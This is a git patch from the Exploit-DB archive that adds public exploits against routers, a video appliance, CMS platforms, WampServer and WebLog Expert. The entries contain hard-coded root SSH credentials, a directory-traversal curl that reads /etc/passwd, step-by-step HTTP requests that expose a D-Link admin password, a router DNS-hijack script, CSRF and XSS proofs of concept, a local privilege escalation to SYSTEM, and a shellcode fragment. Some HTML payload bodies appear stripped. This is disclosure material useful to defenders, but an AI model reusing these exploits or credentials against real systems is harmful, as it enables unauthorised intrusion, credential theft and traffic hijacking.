From b6b60b70e914d83b76fd61e041008b01b354d7f0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 3 Apr 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-04-03 11 changes to exploits/shellcodes WebLog Expert Enterprise 9.4 - Privilege Escalation Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC) Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC) Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery WampServer 3.1.2 - Cross-Site Request Forgery VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials DLink DIR-601 - Admin Password Disclosure OpenCMS 10.5.3 - Cross-Site Request Forgery OpenCMS 10.5.3 - Cross-Site Scripting Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change --- exploits/hardware/webapps/44387.txt | 91 ++++++++++++++ exploits/hardware/webapps/44388.txt | 179 ++++++++++++++++++++++++++++ exploits/hardware/webapps/44393.sh | 62 ++++++++++ exploits/perl/webapps/44386.txt | 108 +++++++++++++++++ exploits/php/webapps/44383.html | 58 +++++++++ exploits/php/webapps/44384.txt | 51 ++++++++ exploits/php/webapps/44385.html | 47 ++++++++ exploits/php/webapps/44391.html | 73 ++++++++++++ exploits/php/webapps/44392.txt | 51 ++++++++ exploits/windows/local/44382.py | 1 - exploits/windows/local/44389.txt | 49 ++++++++ files_exploits.csv | 14 ++- 12 files changed, 781 insertions(+), 3 deletions(-) create mode 100644 exploits/hardware/webapps/44387.txt create mode 100644 exploits/hardware/webapps/44388.txt create mode 100755 exploits/hardware/webapps/44393.sh create mode 100644 exploits/perl/webapps/44386.txt create mode 100644 exploits/php/webapps/44383.html create mode 100644 exploits/php/webapps/44384.txt create mode 100644 exploits/php/webapps/44385.html create mode 100644 exploits/php/webapps/44391.html create mode 100644 exploits/php/webapps/44392.txt create mode 100644 exploits/windows/local/44389.txt diff --git a/exploits/hardware/webapps/44387.txt b/exploits/hardware/webapps/44387.txt new file mode 100644 index 000000000..873d578bf --- /dev/null +++ b/exploits/hardware/webapps/44387.txt @@ -0,0 +1,91 @@ +VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution + +Vendor: VideoFlow Ltd. +Product web page: http://www.video-flow.com +Affected version: 2.10 (X-Prototype-Version: 1.6.0.2) + +System = Indicate if the DVP is configured as Protector, Sentinel or Fortress +Version = The Operating System SW version number +Image version = Production Image version + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 3.07i + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 2.08 + + System: DVP Fortress + Version: 2.10.0.5(R) Jan 7 2018 03:26:35 + Image version: 3.07 + + +Summary: VideoFlow's Digital Video Protection (DVP) product is used by +leading companies worldwide to boost the reliability of IP networks, including +the public Internet, for professional live broadcast. DVP enables broadcast +companies to confidently contribute and distribute live video over IP with +unprecedented levels of service continuity, at a fraction of the cost of +leased lines or satellite links. It accelerates ROI by reducing operational +costs and enabling new revenue streams across a wide variety of markets. + +Desc: The affected device suffers from authenticated remote code execution +vulnerability. Including a CSRF, a remote attacker can exploit this issue +and execute arbitrary system commands granting her system access with root +privileges. + +Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5) + CentOS release 5.10 (Final) (2.6.18-371.el5) + ConfD + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5455 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php + +01.02.2018 + +--- + + +Default credentials (web management): + +admin:admin +oper:oper +private:private +public:public +devel:devel + + +Hard-Coded credentials (ssh): + +root:videoflow +mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./ + + +-------------------------------- > Tools > System > Shell > -------------------------------- +| | +| sh-3.2# id;pwd;uname -a;ls | +| uid=0(root) gid=0(root) | +| /dvp100/confd | +| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 | +| 86 i686 i386 GNU/Linux | +| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs | +| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs | +| browser.log IF-MIB.bin SNMPv2-SMI.fxs | +| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs | +| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs | +| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs | +| docroot SNMP-COMMUNITY-MIB.fxs users.fxs | +| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml | +| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat | +| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs | +| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs | +| sh-3.2# cat /etc/issue | +| CentOS release 5.10 (Final) | +| Kernel \r on an \m | +| | +-------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/hardware/webapps/44388.txt b/exploits/hardware/webapps/44388.txt new file mode 100644 index 000000000..5a67c8504 --- /dev/null +++ b/exploits/hardware/webapps/44388.txt @@ -0,0 +1,179 @@ +# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure +# Google Dork: N/A +# Date: 12/24/2017 +# Exploit Author: Kevin Randall +# Vendor Homepage: https://www.dlink.com +# Software Link: N/A +# Version: Firmware: 2.02NA Hardware Version B1 +# Tested on: Windows 10 + Mozilla Firefox +# CVE : CVE-2018-5708 + +*Been in contact with William Brown CISO of Dlink and disclosed to the vendor* + +1. Description + +Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel + + +2. Proof of Concept +(For proof of concept, the real Admin password is "thisisatest" +Step 1: Access default gateway/router login page + +Step 2: Login with Username Admin and put any random password: (This example the password is test) + +POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login_real.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 +DNT: 1 +Connection: close + +request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0 + +Step 3: Clear Password that was set: + +POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login_real.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 +DNT: 1 +Connection: close + +request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0 + + +Step 4: The following POST request will come back or a variant: + +POST /my_cgi.cgi?0.322727424911867 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver + +Change the request=no_auth to "request=auth" + + +POST /my_cgi.cgi?0.322727424911867 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 +DNT: 1 +Connection: close + +request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver + +Step 5: Forward the request: + + + +Step 6: Forward the following request: + +POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 +DNT: 1 +Connection: close + +request=show_message + + +Step 7: You will then be presented with the following: "Invalid user name or password, please try again" + +Step 8: Click Continue + + + +Step 9: You will see a POST request come back similar to the following: + +POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=get_restore_default + +Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default" + +POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 +DNT: 1 +Connection: close + +request=auth&request=load_settings&table_name=restore_default + + +Step 11: Forward the request: + +Step 12: You will see the following POST request come back or a variant of it: + +POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/wizard_default.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver + + +Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request": + + +Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest" + + +HTTP/1.1 200 OK +Content-type: text/xml +Connection: close +Date: Sat, 06 Jan 2018 13:33:26 GMT +Server: lighttpd/1.4.28 +Content-Length: 2414 + +0044:8a:5b:8d:ba:1310.0.0.00.0.0.00.0.0.0150000.0.0.0on_demand300149200.0.0.00.0.0.00.0.0.0on_demand300140000.0.0.00.0.0.00.0.0.0on_demand30014001AlwaysHomeAP3011gn01adminthisisatest12.02NA01Tue, 11 Nov 2014NAB1 + + + + + +3. Solution: +N/A. Unknown as of the moment \ No newline at end of file diff --git a/exploits/hardware/webapps/44393.sh b/exploits/hardware/webapps/44393.sh new file mode 100755 index 000000000..22f446a6e --- /dev/null +++ b/exploits/hardware/webapps/44393.sh @@ -0,0 +1,62 @@ +# +# +# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01 +# Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/perl/webapps/44386.txt b/exploits/perl/webapps/44386.txt new file mode 100644 index 000000000..e7849be95 --- /dev/null +++ b/exploits/perl/webapps/44386.txt @@ -0,0 +1,108 @@ +VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal + +Vendor: VideoFlow Ltd. +Product web page: http://www.video-flow.com +Affected version: 2.10 (X-Prototype-Version: 1.6.0.2) + +System = Indicate if the DVP is configured as Protector, Sentinel or Fortress +Version = The Operating System SW version number +Image version = Production Image version + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 3.07i + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 2.08 + + System: DVP Fortress + Version: 2.10.0.5(R) Jan 7 2018 03:26:35 + Image version: 3.07 + + +Summary: VideoFlow's Digital Video Protection (DVP) product is used by +leading companies worldwide to boost the reliability of IP networks, including +the public Internet, for professional live broadcast. DVP enables broadcast +companies to confidently contribute and distribute live video over IP with +unprecedented levels of service continuity, at a fraction of the cost of +leased lines or satellite links. It accelerates ROI by reducing operational +costs and enabling new revenue streams across a wide variety of markets. + +Desc: The application suffers from an authenticated arbitrary file disclosure +vulnerability including no session expiration. Input passed via the 'ID' parameter +in several Perl scripts is not properly verified before being used to download +system files. This can be exploited to disclose the contents of arbitrary +files via directory traversal attacks. + +Scripts affected: + +$ grep -rnH "Content-Disposition" . +./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n"; +./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n"; +./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; +./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n"; +./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; + +---------------------------------------------------------------------------- +/dvp100/confd/docroot/cgi-bin/downloadsys.pl: +--------------------------------------------- + + 1 #!/usr/bin/perl -wT + 2 # http://www.sitepoint.com/file-download-script-perl/ + 3 + 4 use strict; + 5 use CGI; + 6 use CGI::Carp qw ( fatalsToBrowser ); + 7 my $files_location; + 8 my $query = CGI->new; + 9 my $ID = $query->param('ID'); + 10 my @fileholder; + 11 + 12 $files_location = "/dvp100/confd/docroot/cgi-bin/"; + 13 #$ID = "syslog.tar.gz"; #param('ID'); + 14 + 15 if ($ID eq '') { + 16 + 17 } else { + 18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file'); + 19 @fileholder = ; + 20 close (DLFILE) || Error ('close', 'file'); + 21 print "Content-Type:application/x-download\n"; + 22 print "Content-Disposition:attachment;filename=$ID\n\n"; + 23 print @fileholder; + 24 } + +---------------------------------------------------------------------------- + +Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5) + CentOS release 5.10 (Final) (2.6.18-371.el5) + ConfD + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5454 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php + +01.02.2018 + +--- + + +curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218 +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/php/webapps/44383.html b/exploits/php/webapps/44383.html new file mode 100644 index 000000000..3c9fd6bd2 --- /dev/null +++ b/exploits/php/webapps/44383.html @@ -0,0 +1,58 @@ +# Exploit Title:​​ Cross Site Request Forgery- Frog CMS +# Date: 31-03-2018 +# Exploit Author: Samrat Das +# Contact: http://twitter.com/Samrat_Das93 +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Version: 0.9.5 +# CVE : CVE-2018-8908 +# Category: Webapp CMS + + +1. Description + +The application source code is coded in a way which allows malicious HTML +request to be executed without veryifying source of request.This leads to +arbitary execution with malicous request which will lead to the creation of +a privileged user. + +2. Proof of Concept + + Visit the application + Visit the Add Users Page. + Craft an html page with all the details for an admin user creation +and host it on a server + Upon the link being clicked by a logged in admin user, immidiately, +another admin user will get created. + +Exploit Code: + + + +
+ + + + + + + + +
+ + + + +3. Solution: + +Solution - Fix & Patch: The application code should be configured to +implement anti csrf token to filter malicous HTTP Requests. + + +4. Public Reference with POC and steps: + +http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html + +Thanks and Regards +Samrat \ No newline at end of file diff --git a/exploits/php/webapps/44384.txt b/exploits/php/webapps/44384.txt new file mode 100644 index 000000000..06c4e0cd7 --- /dev/null +++ b/exploits/php/webapps/44384.txt @@ -0,0 +1,51 @@ + # Exploit Title: WampServer 3.1.1 XSS via CSRF +# Date: 31-03-2018 +# Software Link: http://www.wampserver.com/en/ +# Version: 3.1.1 +# Tested On: Windows 10 +# Exploit Author: Vipin Chaudhary +# Contact: http://twitter.com/vipinxsec +# Website: http://medium.com/@vipinxsec +# CVE: CVE-2018-8732 + + +1. Description + +XSS: cross site scripting via CSRF is remotely exploitable. +http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615 + +http://forum.wampserver.com/read.php?2,150617 + +2. Proof of Concept + + +How to exploit this XSS vulnerability: +1. Go to Add a Virtual host and add one to wampserver. +2. Go to Supress Virtual host and select one to delete and then intercept +the request using burp suite or any other proxy tool +3. Change the value of parameter *virtual_del[] *to "> and forward it then you will see the XSS triggered. + +How to see it: +1. Copy and paste this CSRF request in notepad and save it as anything.html + + +
+ " +/> + + + + + +Warning: action="[localhost] is action=' +http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by +double quote("[image: winking smiley] + + +3. Solution: + +Update to version 3.1.3 +http://www.wampserver.com/en/#download-wrapper \ No newline at end of file diff --git a/exploits/php/webapps/44385.html b/exploits/php/webapps/44385.html new file mode 100644 index 000000000..defe8a9ab --- /dev/null +++ b/exploits/php/webapps/44385.html @@ -0,0 +1,47 @@ +# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely +# Date: 31-03-2018 +# Software Link: http://www.wampserver.com/en/ +# Version: 3.1.2 +# Tested On: Windows 10 +# Exploit Author: Vipin Chaudhary +# Contact: http://twitter.com/vipinxsec +# Website: http://medium.com/@vipinxsec +# CVE: CVE-2018-8817 + + +1. Description + +CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote +attacker to force any victim to add or delete virtual hosts. + +http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722 + +2. Proof of Concept + +How to exploit this CSRF vulnerability: +1. Go to Add a Virtual host and add one to wampserver. +2. Now intercept the request with proxy tool like burp suite. +3. Now make a CSRF PoC of the request and to exploit you can host it on +internet and send the link to the victim. + +*Exploit Code for deleting any host remotely:* + +1. Copy and paste this CSRF request in notepad and save it as anything.html + + +
+ + +
+ + + +2. Then run it on your installed vulnerable wampserver. + +3. Solution: + +Update to version 3.1.3 +http://www.wampserver.com/en/#download-wrapper \ No newline at end of file diff --git a/exploits/php/webapps/44391.html b/exploits/php/webapps/44391.html new file mode 100644 index 000000000..5fc09a7f5 --- /dev/null +++ b/exploits/php/webapps/44391.html @@ -0,0 +1,73 @@ +# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities +Injection +# Google Dork: N/A +# Date: 02-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.opencms.org/en/ +# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1 +# Affected Version: 10.5.3 +# Category: WebApps +# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686 +# CVE : CVE-2018-8811 + +1. Vendor Description: + +OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently. + +2. Technical Description: + +Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation. + +3. Proof Of Concept: + +a) Send below crafted request to logged in user who is having Root Administrator level access. + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully. + +c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS. + + +4. Solution: + +Upgrade to latest release. +http://www.opencms.org/en/home/news.html + +5. Reference: +https://github.com/alkacon/opencms-core/issues/586 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811 \ No newline at end of file diff --git a/exploits/php/webapps/44392.txt b/exploits/php/webapps/44392.txt new file mode 100644 index 000000000..449624ad2 --- /dev/null +++ b/exploits/php/webapps/44392.txt @@ -0,0 +1,51 @@ +# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability +# Google Dork: N/A +# Date: 02-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.opencms.org/en/ +# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1 +# Affected Version: 10.5.3 +# Category: WebApps +# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686 +# CVE : CVE-2018-8815 + +1. Vendor Description: + +OpenCms from Alkacon Software is a professional, easy to use website +content management system. OpenCms helps content managers worldwide to +create and maintain beautiful websites fast and efficiently. + +2. Technical Description: + +Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon +OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or +HTML via a malicious SVG image. + +3. Proof Of Concept: + +a) Login as user who is having Gallery Editor role. +b) Navigate to gallery and upload below svg file. + + + + + + + +c) Once other user who is having Root Administrator permissions visited the +image link or viewed the uploaded svg image the script get executed. + +4. Solution: + +Upgrade to latest release. +http://www.opencms.org/en/home/news.html + +5. Reference: +https://github.com/alkacon/opencms-core/issues/587 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815 \ No newline at end of file diff --git a/exploits/windows/local/44382.py b/exploits/windows/local/44382.py index 64a4dc85a..b026006a7 100755 --- a/exploits/windows/local/44382.py +++ b/exploits/windows/local/44382.py @@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually #!/usr/bin/python import socket -# Create an array of buffers, from 1 to 5900, with increments of 200. calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" diff --git a/exploits/windows/local/44389.txt b/exploits/windows/local/44389.txt new file mode 100644 index 000000000..5985915f7 --- /dev/null +++ b/exploits/windows/local/44389.txt @@ -0,0 +1,49 @@ +Exploit Author: bzyo +Twitter: @bzyo_ +Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation +Date: 03-31-2018 +Vulnerable Software: WebLog Expert Enterprise 9.4 +Vendor Homepage: https://www.weblogexpert.com/ +Version: 9.4 +Software Link: https://www.weblogexpert.com/download.htm +Tested On: Windows 7 x86 and x64 + + +Details: +By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account. +If WebLog Expert Schedule Service is installed by an administrator, regular users have the +ability to run tasks as Local System. + + +Exploit: +1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed + +2. Open WebLog Expert and then Schedule + +3. Select Add, Next, choose 'Sample - HTML' under Profile, Next + +4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below + Command: C:\Windows\System32\cmd.exe + Run in: C:\Windows\System32\ + +5. Select Next, Finish, Highlight New Task, select Run Now + +6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message' + +7. Select 'View the message' + +8. Command prompt is shown + C:\Windows\system32>whoami + nt authority\system + +Prerequisites: +To successfully exploit this vulnerability, an attacker must already have access +to a system running WebLog Expert and WebLog Expert Schedule Service using a +low-privileged user account + +Risk: +The vulnerability allows local attackers to escalate privileges and execute +arbitrary code as Local System aka Game Over. + +Fix: +Under Schedule Options, change default account that runs scheduled tasks \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c88125e92..6091a6dfd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port 44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows, 44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows, 44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows, +44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port 44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php, 44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php, -44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, +44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php, -44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp, +44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp, +44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php, +44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php, +44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php, +44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl, +44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware, +44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware, +44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php, +44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php, +44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,